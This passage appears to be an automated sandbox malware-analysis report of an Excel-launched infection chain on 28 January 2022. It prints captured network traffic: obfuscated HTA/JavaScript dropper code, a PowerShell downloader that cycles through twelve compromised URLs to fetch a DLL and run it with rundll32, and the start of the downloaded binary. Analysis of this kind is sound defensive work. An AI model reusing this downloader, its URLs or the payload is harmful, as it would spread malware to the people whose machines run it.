25 36 44 5c 31 37 30 25 33 38 25 33 38 25 33 33 25 33 34 25 33 34 25 34 31 27 20 20 20 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7d 0c 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 19 7f 36 7f 31 7f 79 7f 25 7f 33 7f 37 7d 24 7f 44 7d 1d 7d 26 7f 32 7d 26 7f 33 7f 42 7d 20 7f 31 7d 19 7f 37 7f 31 7d 24 7f 38 7d 5c 27 7d 19 7f 32 7f 33 7f 25 7f 37 7f 34 7d 06 7d 19 7f 35 7f 36 7f 25 7f 36 7d 2a 7f 45 7f 66 7d 20 7f 32 7d 3e 7f 37 7f 6d 7f 43 7f 68 7d 41 7f 31 7f 72 7f 25 7f 34 7f 33 7d 48 7d 19 7f 34 7f 34 7f 65 7d 1d 7d 35 7f 33 7d 33 7f 33 7d 39 7f 32 7f 43 7d 24 7d 5b 7f 30 7d 1d 7f 39 7d 24 7f 42 7d 45 7f 31 7f 35 7f 37 7d 4f 7f 32 7d 35 7f 36 7d 64 7f 33 7d 28 7f 33 7d 62 7d 2d 7f 69 7d 24 7d 5f 7f
                                                                                                                    Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_
                                                                                                                    Jan 28, 2022 21:18:21.949457884 CET3INData Raw: 33 7d 1c 7d 5a 7d 24 7d 2c 7d 6f 7f 42 7d 41 7d 64 7f 32 7d 7e 7c 01 7d 63 7d 3a 7d 2e 7d 1a 7d 30 7f 31 7d 32 7d 7b 7d 1d 7d 7e 7d 70 7f 71 7d 31 7d 5b 7d 35 7f 37 7d 71 7d 7e 7f 36 7d 40 7f 37 7f 35 7d 3e 7f 36 7f 63 7d 3a 7f 34 7f 69 7d 48 7d
                                                                                                                    Data Ascii: 3}}Z}$},}oB}A}d2}~|}c}:}.}}01}2}{}}~}pq}1}[}57}q}~6}@75}>6c}:4i}H}AE}}|}:}o}@}l|7Bif}X}1d}Hcument}E}T4o|||6|8M}S1}U}T5}|(|(|1| 6}9|@|7|92Ea}>4|V|*|}Uo}T|O5|6|!|REwr}>1t|G|/}2||2}d|}:
                                                                                                                    Jan 28, 2022 21:18:21.949542046 CET4INData Raw: 2d 78 7b 7e 48 78 7e 78 30 7f 36 78 32 7f 3e 7f 54 7f 68 78 47 7f 73 77 5c 6e 7f 72 79 5a 7f 20 78 2a 78 1f 7f 20 7f 6f 7f 66 7f 20 7f 74 7f 68 7f 69 7f 73 7f 20 7b 57 7a 73 7f 20 77 25 77 5c 27 77 09 78 09 7f 63 78 09 78 5c 27 7f 62 7f 79 7f 20
                                                                                                                    Data Ascii: -x{~Hx~x06x2>ThxGsw\nryZ x*x of this {Wzs w%w\'wxcxx\'by <b~gxJxCxExxwx} xFCCw~#~% Guardx]nyzxJ~g/w6w4brww ul~2maxw"ox+w`w,ow.t yw wE~&wexZiw]zssxZJa} }p{&twt wv}y|xw~
                                                                                                                    Jan 28, 2022 21:18:21.949568033 CET6INData Raw: 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 2b 3d 27 32 7e 34 78 53 7f 6e 7e 34 7f 65 78 7a 78 2b 77 0f 77 3f 77 7a 62 77 42 78 32 7e 09 7f 72 7a 17 78 16 7e 70 7e 40 7f 2f 7e 42 7f 77 7f 2e 7f 70 77 2d 76 1a 76 47 7f 2e 78 2a 7f 6d 78 1b 78 5c 72
                                                                                                                    Data Ascii: 2KcI8HWQPA8[0]+='2~4xSn~4exzx+ww?wzbwBx2~rzx~p~@/~Bw.pw-vvG.x*mxx\r~Ixdx_x~.kx#wTw7vv0w;xIvxLxNxPxRxTxVxXxZx\\x^wkxaxcxexgsxixkxmfxoxq~0xtxvxxv?x|x~vCwC0wwwwww\rv@w>x/0x1x">vM.Pw-WwJv&vUwOvwQw6yzawQ~du#v-/x
                                                                                                                    Jan 28, 2022 21:18:21.949590921 CET7INData Raw: 28 71 38 7e 58 73 4b 78 66 78 6c 7e 5c 27 7f 3a 73 14 72 44 71 13 7b 69 71 15 7f 28 7f 37 7f 39 7f 2c 71 50 71 52 71 51 7b 21 71 52 73 36 71 56 71 59 71 58 71 5b 71 57 75 2d 77 55 7d 7a 62 7f 6b 7f 3b 71 46 78 47 7f 32 71 49 72 66 74 05 7f 65 72
                                                                                                                    Data Ascii: (q8~XsKxfxl~\':srDq{iq(79,qPqRqQ{!qRs6qVqYqXq[qWu-wU}zbk;qFxG2qIrfterrqMru38,47qoqq}hqo1s75,qQqQ{qwqwq^vGaqaqc 3qfqKqiqru0,qmpqnqtqQpqy,q|qt}hqq`qbtxG4pu0qLrtqp\rqpqrq}z-q}qzp2q}p;q_pu.zawZtpqhqjp!
                                                                                                                    Jan 28, 2022 21:18:21.949625015 CET8INData Raw: 25 32 39 25 32 43 25 36 43 25 33 30 25 33 44 6e 25 36 35 5c 31 36 37 25 32 30 5c 31 30 31 25 37 32 72 5c 31 34 31 25 37 39 25 32 38 25 32 39 25 32 43 49 25 36 43 25 33 44 25 33 31 25 33 32 25 33 38 25 33 42 64 5c 31 35 37 25 37 42 6c 25 33 30 25
                                                                                                                    Data Ascii: %29%2C%6C%30%3Dn%65\167%20\101%72r\141%79%28%29%2CI%6C%3D%31%32%38%3Bd\157%7Bl%30%5B%49l%5D%3D%53tr%69\156g%2EfromCh\141%72Co\144%65%28Il%29%7D\167%68%69%6Ce%28%2D%2DI%6C%29%3BIl%3D%31%32%38%3Bl%31%5B%30%5D%3D%6Ci%3Dl%30%5Bl%37%5B%30%5D%5D%3B%
                                                                                                                    Jan 28, 2022 21:18:21.949677944 CET10INData Raw: 34 7f 53 7f 69 78 0f 73 2a 70 43 6f 58 6d 18 7f 28 7f 78 7f 75 7f 75 6e 62 6d 62 6d 21 72 31 6f 29 73 4b 7f 72 7f 3d 6f 40 77 23 6e 52 7e 2e 78 03 74 4c 75 2d 7f 64 70 37 7f 20 7f 44 6e 6d 6c 10 75 67 6f 69 6f 1a 74 1b 74 24 6f 2a 6c 34 73 4b 7f
                                                                                                                    Data Ascii: 4Sixs*pCoXm(xuunbmbm!r1o)sKr=o@w#nR~.xtLu-dp7 Dnmlugoiott$o*l4sKo=s(}y(s,s.}Ks1s3(lroBfx,pzr*25+{?n]lxG{kks,ks>kd*ospB+\'tDosOou;k/k1=ol1klOkk2k.k4tVtOtQx7k5lp{y}w xtXvN}dExc|8Lw%vztw\'wz
                                                                                                                    Jan 28, 2022 21:18:21.949698925 CET11INData Raw: 7f 2e 7e 3e 7f 69 75 2c 67 4d 67 59 7f 28 7f 38 67 63 67 5f 67 73 78 18 7f 34 67 5d 67 2e 7f 22 78 61 7e 7d 69 41 6f 67 77 79 7f 61 74 18 7f 73 77 26 78 39 7f 43 6c 0b 7f 65 68 52 7f 6a 68 56 6f 6d 67 56 7f 29 69 41 7f 63 66 12 7f 76 67 58 67 61
                                                                                                                    Data Ascii: .~>iu,gMgY(8gcg_gsx4g]g."xa~}iAogwyatsw&x9ClehRjhVomgV)iAcfvgXga(gssEg]gwffg^g`s>5pBffff9f#ff\'ff)yx+gsf,f+f&f(f}iyxf1s>xs~f.frgzf7s}pf?gysgx0s~fB08fDf<fIf3s>}xf\nffs.R}wfgMgDbgFnxZffJi_gNx,x
                                                                                                                    Jan 28, 2022 21:18:21.949717999 CET12INData Raw: 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 62 33 52 5a 34 44 32 78 42 50 77 20 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 68 57 50 44 66 35 6c 74 53 37 4d 59 37 32 59 32 34 34 20 20 20 20 28 78 32 63 56 58 6c 33 39 29 3b 67 38 35
                                                                                                                    Data Ascii: (b17d7QLBh8gh);b3RZ4D2xBPw (b17d7QLBh8gh);hWPDf5ltS7MY72Y244 (x2cVXl39);g85tUx8O57Sri34='vE7JOE4YL7z2BEimBE630IL966M' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));cG3XHY59bDjh8i5+='syQqJrqlvQcnJERouTsFYMXOqfK
                                                                                                                    Jan 28, 2022 21:18:21.949734926 CET12INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    1192.168.2.224916891.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:18:27.714525938 CET13OUTGET /gg/ff/fe.png HTTP/1.1
                                                                                                                    Host: 91.240.118.172
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:18:27.776531935 CET14INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.2
                                                                                                                    Date: Fri, 28 Jan 2022 20:18:27 GMT
                                                                                                                    Content-Type: image/png
                                                                                                                    Content-Length: 1199
                                                                                                                    Connection: keep-alive
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT
                                                                                                                    ETag: "4af-5d6a59dbe5e00"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 68 6f 73 74 66 65 65 6c 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 34 58 73 6a 74 4f 54 37 63 46 48 76 42 56 33 48 5a 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 75 72 6e 61 6c 70 6a 66 2e 6c 61 6e 2e 67 6f 2e 69 64 2f 61 73 73 65 74 73 2f 69 4d 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 69 74 2d 6f 2e 62 69 7a 2f 62 69 74 72 69 78 2f 78 6f 44 64 44 65 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 62 69 6d 65 73 61 72 61 79 65 6e 6f 76 69 6e 2e 69 72 2f 77 70 2d 61 64 6d 69 6e 2f 47 31 70 59 47 4c 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 67 61 72 64 65 6e 69 6e 67 66 69 6c 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 63 4d 56 55 59 44 51 33 71 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 69 73 79 2e 73 75 6b 6f 62 75 72 75 2d 73 65 63 75 72 65 2e 63 6f 6d 2f 38 70 6c 6b 73 2f 76 38 6c 79 5a 54 65 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 72 6f 70 65 72 74 79 2d 65 67 2e 63 6f 6d 2f 6d 6c 7a 6b 69 72 2f 39 37 76 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 6f 74 61 6c 70 6c 61 79 74 75 78 74 6c 61 2e 63 6f 6d 2f 73 69 74 69 6f 2f 44 67 6b 74 4c 33 7a 64 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 78 74 64 65 76 65 6c 6f 70 65 72 2e 63 6f 6d 2f 6f 6b 77 39 79 78 2f 47 63 32 38 5a 58 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 61 62 6c 72 2e 63 6f 6d 2f 65 6c 65 6e 63 74 69 63 2f 66 4d 46 74 52 72 62 73 45 58 31 67 58 75 33 5a 31 4d 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 63 74 69 76 65 74 72 61 69 6e 69 6e 67 2e 73 79 74 65 73 2e 6e 65 74 2f 6c 69 62 72 61 72 69 65 73 2f 38 73 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 75 64 61 6e 67 74 61 73 6f 72 69 63 68 69 6e 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 47 47 30 31 63 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d
                                                                                                                    Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }
                                                                                                                    Jan 28, 2022 21:18:27.776552916 CET14INData Raw: 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74
                                                                                                                    Data Ascii: catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq;


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    2192.168.2.2249170103.206.244.10580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:18:49.391053915 CET15OUTGET /assets/iM/ HTTP/1.1
                                                                                                                    Host: jurnalpjf.lan.go.id
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:18:49.579858065 CET17INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 28 Jan 2022 20:18:49 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) PHP/7.4.27
                                                                                                                    X-Powered-By: PHP/7.4.27
                                                                                                                    Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 20:18:49 GMT
                                                                                                                    Expires: Fri, 28 Jan 2022 20:18:49 GMT
                                                                                                                    Content-Disposition: attachment; filename="KfCx9N.dll"
                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                    Content-Length: 548864
                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B
                                                                                                                    Jan 28, 2022 21:18:49.579883099 CET18INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:18:49.579899073 CET19INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:18:49.579916000 CET21INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:18:49.579931974 CET22INData Raw: 89 4d f8 8b 4d f8 e8 4f 00 00 00 89 45 fc 8b 4d fc e8 04 00 00 00 8b e5 5d c3 55 8b ec 51 89 4d fc 8b 45 fc 83 c0 0c 83 c9 ff f0 0f c1 08 49 85 c9 7f 17 8b 55 fc 52 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc
                                                                                                                    Data Ascii: MMOEM]UQMEIUREUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>
                                                                                                                    Jan 28, 2022 21:18:49.579947948 CET23INData Raw: 01 89 45 10 85 d2 74 13 8b 4d fc 8a 55 fb 88 11 8b 45 fc 83 c0 01 89 45 fc eb dd 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 00 00 00 eb 09 8b 55 f4 83 c2 01 89
                                                                                                                    Data Ascii: EtMUEEE]UEEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEPEM;Mr
                                                                                                                    Jan 28, 2022 21:18:49.579963923 CET25INData Raw: 00 eb 12 8b 4d fc 83 c1 01 89 4d fc 8b 55 e4 83 c2 28 89 55 e4 8b 45 08 8b 08 0f b7 51 06 39 55 fc 0f 8d c0 00 00 00 8b 45 e4 8b 48 08 89 4d dc 8b 55 08 8b 42 30 83 e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b 55 08 52 8b 4d d4 e8 b5 fd ff ff 89
                                                                                                                    Data Ascii: MMU(UEQ9UEHMUB0#EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEUR
                                                                                                                    Jan 28, 2022 21:18:49.579981089 CET26INData Raw: 45 0c 50 8b 4d 08 51 ff 15 a8 62 04 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 ff 15 a4 62 04 10 5d c3 cc 55 8b ec 83 ec 60 89 4d a0 c7 45 bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b 45 0c 50 8b 4d a0 e8 eb f6 ff ff 85
                                                                                                                    Data Ascii: EPMQb]UEPb]U`MEEj@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WE
                                                                                                                    Jan 28, 2022 21:18:49.579996109 CET28INData Raw: 8b 4d fc 8b 55 f0 03 51 24 89 55 e0 c7 45 ec 00 00 00 00 c7 45 e8 00 00 00 00 eb 1b 8b 45 e8 83 c0 01 89 45 e8 8b 4d e4 83 c1 04 89 4d e4 8b 55 e0 83 c2 02 89 55 e0 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b 45 f0 03 02 50 8b 4d 0c 51 e8 3e f1
                                                                                                                    Data Ascii: MUQ$UEEEEMMUUEM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQU
                                                                                                                    Jan 28, 2022 21:18:49.580034971 CET29INData Raw: 30 05 10 0f af 15 c8 30 05 10 03 ca 8b 15 c8 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 2b 0d c4 30 05 10 8b 15 c8 30 05 10 0f af 15 b8 30 05 10 03 0d c4 30 05 10 03 d1 03 15 c4 30 05 10 8b 0d c4 30 05 10 0f af 0d b8 30 05 10 03 d1 2b
                                                                                                                    Data Ascii: 0000++0+0000000+000000++0+0000000+000000++0+00
                                                                                                                    Jan 28, 2022 21:18:49.758980036 CET30INData Raw: 2b 0d c4 30 05 10 a1 c0 30 05 10 0f af 05 c4 30 05 10 03 c8 2b 0d c0 30 05 10 03 0d c8 30 05 10 2b 0d c4 30 05 10 2b 0d c4 30 05 10 8b 15 c4 30 05 10 0f af 15 c4 30 05 10 03 ca 2b 0d c8 30 05 10 a1 c4 30 05 10 0f af 05 c0 30 05 10 0f af 05 c8 30
                                                                                                                    Data Ascii: +000+00+0+000+0000+00+000++00000++00+000+00+0+000+00


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:21:18:18
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
